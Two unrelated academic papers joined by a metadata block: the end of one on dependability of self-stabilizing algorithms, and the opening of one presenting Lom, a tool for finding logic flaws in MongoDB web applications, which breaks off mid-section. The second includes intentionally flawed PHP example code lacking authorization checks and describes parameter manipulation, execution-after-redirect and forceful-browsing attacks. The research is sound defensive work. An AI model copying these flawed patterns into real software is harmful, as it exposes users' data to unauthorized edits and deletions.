a rather large number of iterations to achieve the threshold value of $A_U(k)$. The problem can be circumvented if one has leeway to fine-tune the randomized scheduler or modify the communication topology. 4.3 Randomized Scheduler Optimization The probabilities with which individual processes are activated in each step by a scheduler affects the convergence time and thus the unconditional instantaneous availability of the system. However, a counterexample can be exploited to identify the processes whose activation probabilities need to be modified. For instance, consider a path returned by the conjunction of PRISM and sbmc: $\langle 2, 2, 1, 2, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 2, 1, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 1, 1, 1, 1, 2 \rangle \rightarrow \langle 0, 0, 1, 1, 1, 1, 1, 2 \rangle$ In the second last state of the path, activation of the root process does not bring any state change and thus leads only to an increase in convergence time. Hence, if the probability of activating a non-root process in the scope of the example algorithm is increased, then the probability associated with such sub-optimal paths can be decreased. We varied the probability of activating the root process in the example system to see the effect on $A_U(k)$. As Figure 6 shows, unconditional instantaneous availability increases as the probability of activating the root is decreased. This is because one write operation of the root process alone corrects its local state; further activations are time-consuming only. But once the root process has performed a computation step, any activation of a non-root process corrects its local state. The paths in the counterexample can be analyzed in order to identify those processes whose activations lead to void transitions. The respective process activation probabilities of the scheduler can then be fine-tuned to increase $A_U(k)$. 4.4 Abstraction Schemes for Silent Self-Stabilization Probabilistic model checking of self-stabilizing systems suffers from the state space explosion problem even for a small number of processes. This is due to the fact that the set of initial states of a self-stabilizing system is equal to the entire state space. As we intend to quantify the dependability of a self-stabilizing algorithm in an implementation scenario, we may be confronted with systems having a large number of processes. This necessitates a method to reduce the size of the model before giving it to the model checker. Often, data abstraction is used to reduce the size... of large systems while preserving the property under investigation [13]. We next evaluate existing abstraction schemes and identify a suitable abstraction scheme for silent self-stabilizing systems. Data abstraction constructs an abstract system by defining a finite set of abstract variables and a set of expressions which maps variables of the concrete system to the domain of the abstract variables. A form of data abstraction is predicate abstraction where a set of Boolean predicates is used to partition the concrete system state space [14]. Doing so results in an abstract system whose states are tuples of boolean variables. However, predicate abstraction can only be used to verify safety properties as it does not preserve liveness properties [15]. Since convergence is a liveness property, predicate abstraction cannot be used to derive smaller models of self-stabilizing systems. Ranking abstraction overcomes the deficiency of predicate abstraction by adding a non-constraining progress monitor to a system [15]. A progress monitor keeps track of the execution of the system with the help of a ranking function. The resulting augmented system can then be abstracted using predicate abstraction. An important step in abstracting a system using a ranking abstraction is the identification of a so called ranking function core. This need not be a single ranking function – parts of it suffice to begin the verification of a liveness property. The fact that we are trying to evaluate a silent self-stabilizing system makes the search of a ranking function core easier. The proof of the convergence property of a self-stabilizing system is drawn using either a ranking function [17], for instance a Lyapunov function [18], or some other form of well-foundedness argument [19]. Thus, one already has an explicit ranking function (core) and, if that is not the case, then the ranking function core can be “culled” from the proof of a silent self-stabilizing system. Further, we can derive an abstracted self-stabilizing system with the help of usual predicate abstraction techniques once the system has been augmented with a ranking function. 5 Conclusion and Future Work We defined a set of metrics, namely unconditional instantaneous availability, generic instantaneous availability, MTTF, and MTTR, to quantify the dependability of self-stabilizing algorithms. These metrics can also be used to compare different self-stabilizing solutions to a problem. We also showed how to model a self-stabilizing system as a MDP or as a MC to derive these metrics. Further, heuristic-based methods were presented to exploit counterexamples of probabilistic model checking and to re-engineer silent self-stabilizing systems. There are still open challenges with respect to dependability engineering of self-stabilizing systems. An abstraction scheme suitable for non-silent self-stabilizing algorithms is required to make their dependability analysis scalable. 4 However, for the properties considered here, which are step-bounded properties, this reasoning does not apply. In fact, we experimented with the predicate-abstraction-based probabilistic model checker PASS [16] that also supports automatic refinement. This was not successful because PASS seemingly was unable to handle the many distinct guards appearing in the initial state abstraction. As discussed, there are multiple ways to refine a system which in turn leads to the challenge of finding the most viable alternative. We would also like to increase the tool support for dependability engineering of self-stabilizing systems. We believe that the identification of optimal schedulers and the determination of feasible transitions are the most promising candidates for solving the problem. References
{"Source-Url": "http://www2.informatik.uni-freiburg.de/~wimmer/pubs/dhama-et-al-sss-2009.pdf", "len_cl100k_base": 9648, "olmocr-version": "0.1.53", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 43874, "total-output-tokens": 11396, "length": "2e13", "weborganizer": {"__label__adult": 0.00047087669372558594, "__label__art_design": 0.0005164146423339844, "__label__crime_law": 0.0005612373352050781, "__label__education_jobs": 0.001041412353515625, "__label__entertainment": 0.00011998414993286131, "__label__fashion_beauty": 0.0002639293670654297, "__label__finance_business": 0.0004267692565917969, "__label__food_dining": 0.0005192756652832031, "__label__games": 0.0010833740234375, "__label__hardware": 0.00218963623046875, "__label__health": 0.001445770263671875, "__label__history": 0.0004992485046386719, "__label__home_hobbies": 0.00017750263214111328, "__label__industrial": 0.0008711814880371094, "__label__literature": 0.0005617141723632812, "__label__politics": 0.00045609474182128906, "__label__religion": 0.0007505416870117188, "__label__science_tech": 0.2744140625, "__label__social_life": 0.00012755393981933594, "__label__software": 0.00864410400390625, "__label__software_dev": 0.703125, "__label__sports_fitness": 0.00044155120849609375, "__label__transportation": 0.0010890960693359375, "__label__travel": 0.00026798248291015625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 47399, 0.02372]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 47399, 0.65659]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 47399, 0.90017]], "google_gemma-3-12b-it_contains_pii": [[0, 2947, false], [2947, 6483, null], [6483, 9855, null], [9855, 13325, null], [13325, 16511, null], [16511, 20073, null], [20073, 23131, null], [23131, 25287, null], [25287, 28093, null], [28093, 31255, null], [31255, 34487, null], [34487, 38269, null], [38269, 40910, null], [40910, 44265, null], [44265, 47399, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2947, true], [2947, 6483, null], [6483, 9855, null], [9855, 13325, null], [13325, 16511, null], [16511, 20073, null], [20073, 23131, null], [23131, 25287, null], [25287, 28093, null], [28093, 31255, null], [31255, 34487, null], [34487, 38269, null], [38269, 40910, null], [40910, 44265, null], [44265, 47399, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 47399, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 47399, null]], "pdf_page_numbers": [[0, 2947, 1], [2947, 6483, 2], [6483, 9855, 3], [9855, 13325, 4], [13325, 16511, 5], [16511, 20073, 6], [20073, 23131, 7], [23131, 25287, 8], [25287, 28093, 9], [28093, 31255, 10], [31255, 34487, 11], [34487, 38269, 12], [38269, 40910, 13], [40910, 44265, 14], [44265, 47399, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 47399, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
655ad9514683ef3da6820f8408b47376bae0c330
The final publication is available at Springer via http://doi.org/10.1007/s11633-016-1051-x ResearchSPAce http://researchspace.bathspa.ac.uk/ This pre-published version is made available in accordance with publisher policies. Please cite only the published version using the reference above. Your access and use of this document is based on your acceptance of the ResearchSPAce Metadata and Data Policies, as well as applicable law:- https://researchspace.bathspa.ac.uk/policies.html Unless you accept the terms of these Policies in full, you do not have permission to download this document. This cover sheet may not be removed from the document. Please scroll down to view the document. Toward Discovering Logic Flaws within MongoDB-Based Web Applications Shuo Wen1 Yuan Xue2 Jing Xu1 Li-Ying Yuan1 Wen-Li Song1 Hong-Ji Yang3 Guan-Nan Si4 1Institute of Machine Intelligence, College of Computer and Control Engineering, Nankai University, Tianjin 300350, China 2Department of Electrical Engineering and Computer Science, Vanderbilt University, Nashville, Tennessee 37212, United States 3Centre for Creative Computing, Bath Spa University, Bath, BA2 9BN, United Kingdom 4School of Information Science and Electrical Engineering, Shandong Jiaotong University, Jinan 250357, China Abstract: Logic flaws within web applications will allow malicious operations to be triggered towards back-end database. Existing approaches to identifying logic flaws of database accesses are strongly tied to SQL statement construction and cannot be applied to the new generation of web applications that use NoSQL databases as the storage tier. In this paper, we present Lom, a black-box approach for discovering many categories of logic flaws within MongoDB-based web applications. Our approach introduces a MongoDB operation model to support new features of MongoDB and models the application logic as a Mealy finite state machine. During the testing phase, test inputs which emulate state violation attacks are constructed for identifying logic flaws at each application state. We apply Lom to several MongoDB-based web applications and demonstrate its effectiveness. Keywords: Logic Flaw, Web Application Security, MongoDB. 1 Introduction Web applications have become a major information access portal these years. These applications interact with back-end databases on behalf of their users. The back-end database executes all the operations requested by the web application with its privileges, and therefore the application is indispensable for ensuring security checks effective before the database accepts an operation. So web applications become one of the primary targets for malicious acquiring or manipulating the sensitive information in back-end databases. One category of attacks exploits the application’s input validation mechanisms that allow malformed user inputs to be used for constructing database operations, e.g., SQL queries. The case of notious SQL injections belongs to this type. Another category of attacks, which is referred to as state violation attacks[1], exploits logic flaws within the application. This type of attacks misleads the application into sending database operation at incorrect application states. In contrast to input validation vulnerabilities which have received considerable attention, only limited works have been presented to address logic flaws. The key challenge comes from the fact that logic vulnerabilities are specific to intended functionality of a particular web application, hence general approaches that can be applied to all web applications require an automated way of deriving the application’s intended logic or specification. On the other hand, NoSQL databases are increasingly being employed as an alternative to traditional SQL databases. Their notable characteristics, such as flexible data models, scalable data storage, nicely support the need of web applications where the workloads are massive and data sources may not have a predefined structure. Such flexibility also brings higher risk of logic vulnerabilities into the web applications. However, to the best of our knowledge, no previous work has made efforts to address logic flaws in web applications with NoSQL database as a backend. In this paper, we present Lom, the first systematic black-box approach which discovers logic flaws of database access within MongoDB-based web applications. The reason why we choose MongoDB is two folds: (1) According to the DB-Engines Ranking[2], the popularity of MongoDB is the top 1 among all the NoSQL databases. (2) As far as data modeling concerned, MongoDB, which has a complicated hierarchical data model, is a representative NoSQL database. Although a few existing solutions aim to address logic vulnerabilities within web applications, the characteristics of MongoDB make their approaches not applicable for MongoDB-based web applications: (1) Identical MongoDB operations represented in distinct programming languages have various appearances. However, previous static analysis approaches[3, 4, 5], which can only address pattern-unchanged SQL queries or specific languages, can not handle the diversified MongoDB operation appearances of multiple programming languages. (2) Some black-box approaches[6, 7], which can only target the flat data model of relational databases, are not appropriate for the hierarchical and flexible data model of MongoDB. (3) Many static techniques[3, 5] require the source code of applications for analyzing, or can only be applied to specific web development languages and platforms[5, 8]. (4) A few approaches[6] need to access to server-side session information. (5) Some previous approaches[8, 9, 10] can address only one specific vulnerability and cannot be easily extended to handle other forms of logic flaws. DOI: XXX By contrast, our approach supports the features of MongoDB. We explore the protocol layer to extract the MongoDB operation regardless of programming languages and introduce MPath, which is an XPath-like representation to locate each value in the hierarchical model within the MongoDB operation. In addition, our technique is designed to be general and cover many kinds of logic vulnerabilities. The logic of a web application is modeled by a Mealy finite state machine[11] (Mealy FSM). To discover logic vulnerabilities, the intended state machine is built as a partial state machine over the expected user inputs (MongoDB operations) when users follow the navigation paths within the web application first. After that, on basis of the inferred intended Mealy machine, we generate unexpected test inputs to exploit logic vulnerabilities within the application. These test inputs are related to three categories of attacks. After producing test inputs, we send the test web requests to web applications and evaluate the outputs to discover potential logic flaws. Our contributions are summarized as follows: - We present a novel black-box approach for discovering logic vulnerabilities within MongoDB-based web applications. In particular, by observing the messages in the protocol layer, our approach introduces a MongoDB operation model to represent the MongoDB actions triggered within the web application. We characterize the logic flaws over the Mealy FSM, systematically utilize the observed user inputs for deriving the specification and generate test inputs to exploit vulnerabilities. - Our approach is able to cover numerous categories of logic flaws without the need of application source code and server-side session information, therefore it can support different coding languages and environments. - We implemented a prototype system Lom and demonstrate that Lom can be used to identify logic flaws in today’s MongoDB-based web applications. The rest of this paper is organized as follows. We present our problem formulation in Section 3. Our approach and implementation are illustrated in details in Section 4 and Section 5, respectively. Section 6 presents our experimental results. Finally, Section 2 discusses related work and the paper is concluded in Section 7. 2 Related Works To the best of our knowledge, only two existing researches make efforts on NoSQL database security. Okman et al.[13] analyzes the main functionality and security features of two popular NoSQL databases: MongoDB and Cassandra. Aniello et al.[14] analyzes the vulnerabilities of the gossip-based membership protocol used by Cassandra. Nonetheless, none of these approaches concentrates on the flaw with in NoSQL database based web applications, while our approach detects logic flaws with in modern MongoDB-based web applications. Most previous researches[10, 15, 16, 17] endeavor to exploit various vulnerabilities within web applications. For instance, SecuBat[18] are used to identify input validation vulnerabilities. Nevertheless, very few techniques address logic flaws within modern web applications. There are two categories of approaches researched for securing legacy web applications from logic flaws: 1. **Vulnerability Analysis**: It tries to identify and fix the logic vulnerabilities within the applications. 2. **Attack Detection**: It tries to detect and block logic attacks launched against the vulnerable applications. The key issue that is common for both approaches is how to derive the application logic specification. Then the logic specification is used for either attack detection or vulnerability analysis. The logic specification that is general to a number of web applications can be manually pre-specified. Nemesis[19] aims at providing reliable authentication and authorization mechanisms for web applications. By modifying the language runtime, it can track users’ credentials and enforce pre-specified security policies over resources, such as files, database objects, etc. CLAMP[20] employs virtualization technology to isolate the application components for different users, so that the current user can only access his/her own data. However, more commonly, the logic specification is specific to each application and not available as a priori. Swaddler[1], BLOCK[21] and SENTINEL[22] establish application-specific behavioral models and identify the runtime deviation from the established model as potential logic attacks. In particular, SENTINEL focuses on securing the database access triggered by the web application based on a set of invariants extracted from execution traces. The objective of these work is to detect whether a given user input violates the application specification, while our objective is to effectively identify concrete inputs to the web application which can violate the specification, which is much more challenging. Our work shares the same objective of identifying logic flaws within web applications as a number of existing works. Swaddler[1], WAPTEC[3], RoleCast[4], Waler[5], Doupé et al.[8], Sun et al.[12], MiMoSA[22] and FixMeUp[23] infer the logic specification from application source code, through either static analysis or instrumentation. However, these techniques are language-dependent and limited in the spectrum of logic flaws they can deal with by their capability of handling language details. For example, Waler[5] can only identify violations of value-related invariants in JSP web applications, which are inferred from dynamic executions. Sun et al.[12] assume a strong role lattice model for identifying access control flaws within PHP web applications. WAPTEC[3] collects the set of constraints along the paths leading to sensitive operations and constructs exploits to circumvent the security checks. Doupé et al.[8] specifically focus on Execution After Redirection vulnerabilities in Ruby web applications by analyzing control flows from application source code. In contrast, our approach extracts the MongoDB operation from the protocol layer without source code requirement, and can be utilized for all programming languages supported by MongoDB. Moreover, most of the above approaches target only one specific vulnerability and cannot be easily extended to handle other categories of logic flaws. Our technique is designed to be general and covers many kinds of logic vulnerabilities. Techniques are also designed to discover logic flaws within web applications without source code. For example, Doupé et al. [8] and NoTamper [9] can address EAR vulnerability and parameter tampering respectively. In comparison, our approaches can cover not only these two attacks, but also forceful browsing attack. InteGuard [24] and EUReCOM [25] attempt to secure multi-party web applications. LogicScope [26], SENTINEL [6] and BLOCK [21] make use of session information to construct application specifications. In comparison, our work does not require server-side session information from the application developers. Li et al. [7] proposes an automated black-box technique for identifying access control vulnerabilities. Though SENTINEL [6] and the work of Li et al. [7] can be applied to traditional RDBMS, they can not handle the hierarchical and schema-less data model of MongoDB, which brings in new challenges. Our technique supports these new features of MongoDB back-end web applications. Web applications are more and more built with third-party web services through APIs and split at both client-side and server-side, where logic vulnerabilities might arise. Wang et al. [27] discovered logic vulnerabilities within the checkout procedures, which can be exploited by the attackers to shop for free. Its further research [28] also identified logic vulnerabilities within web-based single-sign-on services. InteGuard [24] performs security checks over a set of invariant relations among HTTP interactions to defeat logic attack at runtime. INDICATOR [29] employs hybrid analysis to infer the dependency constraints on parameters for web services. Guha et al. [30] extracted event graphs from client-side web applications and detect malicious client behaviors at runtime. Krishnamurthy [31] can be used to build secure web applications, where security policies specified by developers can be automatically verified and enforced. Our technique focuses on logic vulnerabilities within server-side web applications and has the potential to be extended to handle the above scenarios. A number of testing tools, both open-source, e.g., Spike, Burp, and commercial, e.g., IBM AppScan, have been proposed for identifying input validation vulnerabilities within web applications [16]. They feed random inputs from a library of known attack patterns into applications. To improve the testing coverage and efficiency, random fuzzing can be enhanced by guided test input generation [17, 32, 33]. None of these techniques can effectively handle logic vulnerabilities within web applications. 3 Problem Description 3.1 Background of MongoDB 3.1.1 The Data Model of MongoDB Document In MongoDB, the basic unit of data is document whose structure is hierarchical and non-relational. A document includes a set of field/value pairs where the value of a field can even be a document or an array which is a list of values. Array values can be all the supported values for normal field/value pairs in MongoDB, even nested arrays and embedded documents. Figure 1 shows a document which employs embedded documents and array values. Collection MongoDB documents are grouped as one or more collections in a MongoDB database. The schema of a collection does not need to be defined while the collection is created, which means users have more data-modelling flexibilities to match the design and performance requirements of an application. 3.1.2 MongoDB Wire Protocol MongoDB offers many additional drivers for users to work with their proficient programming languages. The same operations represented in distinct drivers may have different appearances. To avoid this difference, we focus on internals of how drivers access the MongoDB server. The drivers use MongoDB Wire Protocol, which is a simple socket-based, request-response style and lightweight TCP/IP wire protocol, to make clients communicate with the MongoDB server through MongoDB request messages. A message defines the concrete data which an operation can access and the type of the operation. With these messages, update, delete, insert and read operations can be performed on MongoDB. 3.1.3 MongoDB Request Variable ```c struct OP_UPDATE { MsgHeader header; // standard header int32 flags; // 0 - upsert; 1 - multiupdate cstring fullCollectionName; // "databaseName.collectionName" int32 flags; // reserved for future use cstring querySelector; // to select the document document updateDefinition; // to specify the update to perform } ``` Figure 2 shows the structure of a category of MongoDB request message (update message). As can be seen from the figure, the data structures of most useful variables in MongoDB Wire Protocol are documents, such as the query selector and the update definition. This structure is able to support complex commands. For instance, Figure 1 is also a MongoDB request variable (query selector). Here “$lt” is a comparison operator corresponding to “less than”. Each of these document structure variables is denoted as MongoDB Request Variable in this paper. Apparently, all the operation parameters are placed in these hierarchical and non-relational variables. ### 3.2 Logic Flaws within MongoDB-based Web Applications Figure 3 shows a simple vulnerable application to illustrate the logic vulnerabilities we concentrate on in our research. A logged in user will be redirected to the “index.php” at first. If the current user is an administrator, he is allowed to achieve links for adding new users, editing and deleting any of the registered users. If the current user is a regular user, he can only browse the page for editing his personal information. We model a web application using a Mealy finite-state machine (Mealy FSM) model \((S, s_0, \Sigma, \Lambda, T, G)\), where \(S\) is the set of states, \(s_0 \in S\) is the initial state, \(\Sigma\) is the set of input symbols, \(\Lambda\) is the set of output symbols, \(T : S \times \Sigma \rightarrow S\) is the set of transition functions mapping pairs of a state and an input symbol to the corresponding next state, \(G : S \times \Sigma \rightarrow \Lambda\) is the set of output functions mapping pairs of a state and an input symbol to the corresponding output symbol. To find out the logic flaws within a web application, we are required to analyze its two categories of Mealy FSMs: 1. **Intended FSM** (denoted as \(F_1\)), which models the behavior of the originally planned web application without any logic flaws; 2. **Realistic FSM** (denoted as \(F_r\)), which models the behavior of the actual web application implemented by the developer. If \(F_r\) is equivalent to \(F_1\), the web application is regarded as secure. Once disparities which involve sensitive operations exist between \(F_r\) and \(F_1\), we affirm the application has logic flaws. As illustrated in Figure 4, the example application has three states: the guest user who is not logged in \((s_0)\), regular user \((s_1)\) and administrator \((s_2)\). Each input symbol \(I \in \Sigma\) is an abstract representation of the triggered operation on back-end MongoDB (e.g., op1, op2 and op3 in Figure 3), which consists of two parts: 1. **Operation Contour** (denoted by \(C\)), which represents the contour of the operation (refer to Section 4.3.1 for details); 2. **Transmitted Parameter Mapping** (denoted by \(P\)), which represents both the parameter which can be transmitted from web request to the operation and its related value set (refer to Section 4.3.2 for details). Each output symbol in \(\Lambda\) is the acceptance of the operation by back-end MongoDB. The intended FSM \((F_1)\) for the application works as follows: At state \(s_1\), since it is intended that the regular user can only edit his personal information, when the regular user sends an input symbol \(I_1 = O_1 \cdot P_1\), where the “userid” parameter is equal to the current user id, back-end MongoDB will accept this operation (output symbol \(O_1\)). When this user attempts to edit other users’ information, delete or add a user, i.e., sending \(I_2\) \((I_2\) is different from \(I_1\) due to the diverse parameter mappings\), \(I_3\) or \(I_4\), MongoDB will not accept or trigger the operation (output symbol \(O_2\)). Nonetheless, in this application, there are three logic flaws which are reflected as the discrepancies between \(F_1\) and \(F_r\). First, the “editUser.php” fails to check whether the “userid” parameter is the same as current user’s information. Second, despite the “delUser.php” checks whether current user is an administrator and seems to reject the operation from web response, it does not end the application execution, thus the back-end MongoDB operation is still triggered. Third, the “addUser.php” does not check whether the current user has the admin privilege. These vulnerabilities allow three types of attacks: 1. **Parameter Manipulation Attack**: When \(I_2\) is sent to the application at state \(s_1\), \(O_1\) is returned, which means a regular user can edit other users’ information. 2. **Execution After Redirection (EAR) Attack** [8]: When \(I_3\) is sent to the application at state \(s_1\), \(O_3\) is returned, which means a regular user can still successfully make back-end MongoDB delete other users’ information although \(O_2\) appears to be returned from web response. 3. **Forceful Browsing Attack**: When \(I_4\) is sent to the application at state \(s_1\), \(O_4\) is returned, which means a regular user can add new users. All the attacks mentioned above are common attacks targeting different kinds of logic vulnerabilities within database based web applications. EAR attack is especially challenging due to the attack seems to be defended from web response, however, the back-end database still triggers the database operation which is not designed to run. At a given state \(s\), only a subset of input symbols are expected by the application (denoted as \(\Sigma_{exp}(s)\)) and processed to produce normal output symbols, i.e., \(\Lambda_{nor}(s) = G(s, \Sigma_{exp}(s))\). The expected input symbols are the triggered MongoDB operations when the user follows the navigation links of the web application. The normal output symbols mean that MongoDB accepts the expected MongoDB operations. All the other input symbols, which are not expected at state \(s\), should not be triggered by MongoDB, resulting in blank output symbols. A blank output symbol means that the application refuses to accept the operation and therefore back-end MongoDB does not execute anything. As shown in Figure 4, for state \(s_1\), the expected input set is \({I_1}\), the normal output set and the blank output set is \({O_1}\) and \({O_2}\), respectively. For state \(s_2\), the expected input set is \({I_1, I_2, I_3, I_4}\) and the normal output set is \({O_1, O_3, O_4}\). The behaviors of \(F_1\) and \(F_r\) over the expected input symbols should be consistent because the web application aims at implementing all the intended functionalities. Nevertheless, there may be unexpected inputs which are accepted by \(F_r\). Therefore, if an input symbol, which is not expected at state \(s\), can be transmitted into the application and triggered by MongoDB, MongoDB then generates index.php ```php <?php if ($_SESSION['privilege'] == "admin") { foreach (Salluser as Seachuser) { echo "<a href="delUser.php?userid=".Seachuser.">Delete <a/""; echo "<a href="editUser.php?userid=".Seachuser.">Edit <a/""; } echo "<a href="addUser.php">Add </a/"; } else if ($_SESSION['privilege'] == "commonuser") { echo "<a href="editUser.php?userid="$_SESSION['userid'].">Edit </a/"; } ...... ?> ``` delUser.php ```php <?php if ($_SESSION['privilege'] != "admin") echo("Forbidden access."); //op2 require('dbconnection.php'); $mongo = DBConnection::instance(); $collection = $mongo->getCollection('users'); $Id=$GET['userid']; $collection->remove(array('_id' => new MongoId($Id))); ?> ``` edUser.php ```php <?php require('dbconnection.php'); $mongo = DBConnection::instance(); $collection = $mongo->getCollection('users'); $Id=$GET['userid']; $User = array(); $User['name'] = $_POST['name']; $User['password'] = $_POST['pwd']; $collection->update(array('_id' => new MongoId($Id)), $User); ?> ``` Figure 3 Example Application ``` <op1> require('dbconnection.php'); $mongo = DBConnection::instance(); $collection = $mongo->getCollection('users'); $Id=$GET['userid']; $User = array(); $User['name'] = $_POST['name']; $User['password'] = $_POST['pwd']; $collection->update(array('_id' => new MongoId($Id)), $User); S0 S1 S2 Input Symbols I1 = C1, P: C_op1, [userid : vname] I2 = C1, P: C_op2, [userid : vname] I3 = C1, P: C_op3, [userid : not null] I4 = C1, P: C_op4, [userid : not null] Output Symbols O1: update operation is accepted O2: delete operation is accepted O3: insert operation is accepted O4: blank (operation is not accepted) ``` Figure 4 FSM Representation of Figure 3 an output symbol that falls beyond the blank output set, we recognize this web application has a logic vulnerability at state \( s \). The related input symbol is defined as a malicious input symbol \( I_{\text{mal}} \). 4 Approach 4.1 Approach Overview As mentioned in Section 3.2, we need to construct malicious inputs to verify their outputs for each state. It is a challenging task because we do not possess anything about the entire input symbol set and unexpected input symbol set at each state. Since some malicious inputs, e.g., EAR attacks, can modify the data in back-end MongoDB secretly without affecting intended web responses. To symbolize the input symbol, we need to learn the operation over MongoDB (Section 4.2). The characteristics of MongoDB make the understanding more sophisticated: 1. As illustrated in Section 3.1.2, the same MongoDB operation may have dissimilar expression in different programming language and what is more, an operation may be characterized by several statements in the source code (such as op1, op2 or op3 in Figure 3). Hence we utilize dynamic analysis but not static analysis to make our approach not constrained to specific programming language or driver. We look into the protocol layer, which is the underlying unification of distinct drivers, to extract the MongoDB operation no matter which programming language the application is written in. 2. As Section 3.1.3 shows, the basic data model of MongoDB, which is also utilized in the MongoDB request variable, is hierarchical and non-relational. MongoDB request variables are the most important components of MongoDB request messages. Thus we need to locate each field/value pair in the hierarchical data model. We present MPath to support this nested data structure. Our approach first builds a partial Mealy FSM over the expected input domain by leveraging the collected traces. For each application, we identify user privileges and construct each privilege as a State. Normal users’ traces are collected for different users at each state. The traces we collect include web requests/responses and MongoDB request responses from protocol layer. The traces are symbolized as following: 1. Input Symbolization (Section 4.3), in which we abstract concrete MongoDB operations into input symbols to profile the expected input domain at each state, i.e., \( \Sigma_{\text{exp}}(s), \forall s \in S \); 2. Output symbolization, in which we observe whether the MongoDB accepts the operations or not for generating output symbols and the mappings between the expected inputs and normal output symbols, i.e., \( G(\cdot, \Sigma_{\text{exp}}(\cdot)) \rightarrow \Lambda_{\text{nor}}(\cdot), \forall s \in S \). Application state transitions and the corresponding input symbols that trigger the transitions are also observed in this phase, i.e., \( T : S \times \Sigma \rightarrow S \). After the inference of partial FSM, we will leverage this inferred FSM to construct unexpected inputs at each application state (Section 4.4) and test the application. Output symbols will be evaluated to discover potential logic flaws (Section 4.5). 4.2 MongoDB Operation Analysis A MongoDB operation is related to the read, delete, update or insert message in MongoDB Wire Protocol. It can read or modify the records in MongoDB. We extract the kernel information (message/operation type, collection name and the MongoDB request variables) of a message as its MongoDB operation, which represents its execution on MongoDB performed by the user through the web application. 4.3 Input Symbolization Given a set of MongoDB operations, we need to represent them with a finite number of input symbols. We symbolize each MongoDB operation with a two-part structure, i.e., the operation contour and the transmitted parameter mapping. 4.3.1 Variable/Operation Contour MPath and Variable Contour Since MongoDB request variables are included in MongoDB operations, all the MongoDB request variables in the operations need to be stored reasonably. So the main challenge is how to model all of these variables in a more efficient way for convenient comparison, i.e., locating each parameter easily. To locate each parameter, we introduce MPath which is an analogue of XPath. As an example, the “$lt” parameter of Figure 1 can be expressed as “$or/Number/$lt”. With this kind of effective representation, we can express the original hierarchical MongoDB request variable. We then define the Contour of a MongoDB request variable as the variable without any parameter values. Each original variable is represented as its extracted contour and its parameter value set. For instance, the contour of the Figure 1 can be represented as Figure 5, where “p1” and “p2” represent the value of related parameters. The top of the figure is the document view of the contour and the bottom is the MPath view which is the implementation. Both the contour and the parameter set are derived from its original variable. Operation Contour The operation type, collection name and the variable contours of a MongoDB operation is denoted as its operation contour. Similarly, each operation is represented as its contour and its parameter value set. 4.3.2 Transmitted Parameter Mapping We group all MongoDB operations based on their contours as well as the kernels of their respective web requests. A web request kernel includes HTTP method and request URL path without URL parameters. Each group is denoted as an Operation Group. For a MongoDB operation mo and its related web request wr, we denote a web request parameter of wr is \( p_{\text{wr}} \) and its value is \( v_{\text{wr}} \), a MongoDB operation parameter of mo is \( p_{\text{mo}} \), and its value is \( v_{\text{mo}} \). If \( \exists p_{\text{wr}}, p_{\text{mo}} \wedge v_{\text{wr}} = v_{\text{mo}} \) holds for all MongoDB operations and web requests within the same operation group, we define there is a Parameter Transmission Path from $p_{wr}$ to $p_{mo}$, and denote $p_{wr}$ and its related value set $V_{p_{wr}}$ as a Transmitted Parameter Mapping. 4.3.3 Symbolization We first profile each transmitted parameter mapping and construct this part based on its related value set, i.e., the values of all transmitted parameters because a parameter may appear infinite pairs. The characterization of each value domain is a two step process. The constraints between the parameter value set and the specific state, i.e. privilege, are extracted first by profiling each parameter at each state. For each state, the value set collected for each parameter within the same operation group is utilized for grouping the parameter into three categories: 1. Random Parameter (denoted as $para_{uc}$): The value set of this type of parameter has no limitation. Its value domain is represented with two values: null and notnull. 2. Unbounded Constrained Parameter (denoted as $para_{uc}$): The value set of this type of parameter is affected by certain constraints though it is infinite. Single privilege-related constraint is our focus in this paper, which means the parameter value is always specific for each user under this state (e.g., the value of “userid” of “editUser.php” at $s_1$ in Figure 3 is particular for each user under $s_1$). Its value domain is represented with three kinds of values: null, $v_{con}$ and $v_{ncon}$, where $v_{con}$ denotes the value satisfying a constraint linked to a specific user under this state and $v_{ncon}$ denotes other values. 3. Bounded Parameter (denoted as $para_b$): We represent its value domain with the value set and two kinds of values: null and $v_{outb}$, where $v_{outb}$ denotes the values out of the bounded set. We aggregate all the state views of the parameter value domains into a macroscopic view afterwards. If the value domain types of a parameter is consistent for all states, its domain type will not be changed and be recomputed. For $para_{uc}$, the updated value domain is value set divided by constraints. For $para_b$, its value domain adds additional values. If the value domain types of the parameter over different states are disparate, the more restrictive type (the strictiveness order is defined as $para_{uc} < para_{uc} < para_b$) is adopted and its value domain will be divided. For instance, the parameter “userid” of “editUser.php” in Figure 3 is constrained by specific user at $s_1$, but inferred as an $para_{uc}$ at $s_2$. So its macroscopic type will be $para_{uc}$ and two input symbols are produced at $s_2$, i.e., $C_1 \cdot P_1$ and $C_1 \cdot P_2$. 4.4 Test Input Symbol Generation As Figure 6 illustrates, there are two methods designed for generating test input symbols at a given state $s$. 4.4.1 Parameter Manipulation For an expected input symbol $I = C \cdot P \in 